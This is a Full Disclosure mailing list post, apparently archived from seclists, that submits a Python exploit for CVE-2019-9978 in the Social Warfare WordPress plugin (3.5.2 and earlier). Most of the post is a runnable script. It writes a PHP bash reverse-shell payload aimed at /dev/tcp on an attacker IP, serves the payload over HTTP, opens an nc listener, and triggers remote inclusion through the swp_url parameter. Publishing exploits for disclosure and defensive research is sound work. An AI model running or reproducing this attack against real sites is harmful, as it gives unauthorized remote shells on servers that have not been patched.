[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)
From: Housma mardini <housma@xxxxxxxxx>
Date: Fri, 30 May 2025 13:31:42 +0400

Hi,

I am submitting an exploit for *CVE-2019-9978*, a remote code execution
vulnerability in the Social Warfare WordPress plugin (version <= 3.5.2).

*Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare
WordPress Plugin (<= 3.5.2)

*Date*: 2025-05-20

*Exploit Author*: Huseyin Mardinli

*Vendor Homepage*: https://warfareplugins.com/

*Software Link*: https://wordpress.org/plugins/social-warfare/

*Version*: <= 3.5.2

*Tested on*: Apache, Ubuntu 20.04

*CVE*: CVE-2019-9978

Please find the attached Python exploit code for this vulnerability.

Best regards,
Huseyin Mardinli

#!/usr/bin/env python3

import requests
import threading
import http.server
import socketserver
import os
import subprocess
import time

# --- Config ---
TARGET_URL = "http://example.com";
ATTACKER_IP = "192.168.26.130"  # Change to your attack box IP
HTTP_PORT = 8000
LISTEN_PORT = 4444
PAYLOAD_FILE = "payload.txt"


def create_payload():
    """Write exact reverse shell payload using valid PHP syntax"""
    payload = f'<pre>system("bash -c \\"bash -i >& 
/dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")</pre>'
    with open(PAYLOAD_FILE, "w") as f:
        f.write(payload)
    print(f"[+] Payload written to {PAYLOAD_FILE}")


def start_http_server():
    """Serve payload over HTTP"""
    handler = http.server.SimpleHTTPRequestHandler
    with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd:
        print(f"[+] HTTP server running at port {HTTP_PORT}")
        httpd.serve_forever()


def start_listener():
    """Start Netcat listener"""
    print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...")
    subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)])


def send_exploit():
    """Trigger the exploit with vulnerable parameter"""
    payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}";
    exploit = 
f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}"
    print(f"[+] Sending exploit: {exploit}")
    try:
        requests.get(exploit, timeout=5)
    except requests.exceptions.RequestException:
        pass


def main():
    create_payload()

    # Start web server in background
    http_thread = threading.Thread(target=start_http_server, daemon=True)
    http_thread.start()
    time.sleep(2)  # Give server time to start

    # Start listener in background
    listener_thread = threading.Thread(target=start_listener)
    listener_thread.start()
    time.sleep(1)

    # Send the malicious request
    send_exploit()


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("[-] Interrupted by user.")

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Prev by Date: [FD] Youpot honeypot
Next by Date: [FD] CVE-2024-47081: Netrc credential leak in PSF requests library
Previous by thread: [FD] Youpot honeypot
Next by thread: [FD] CVE-2024-47081: Netrc credential leak in PSF requests library
Index(es):
- Date
- Thread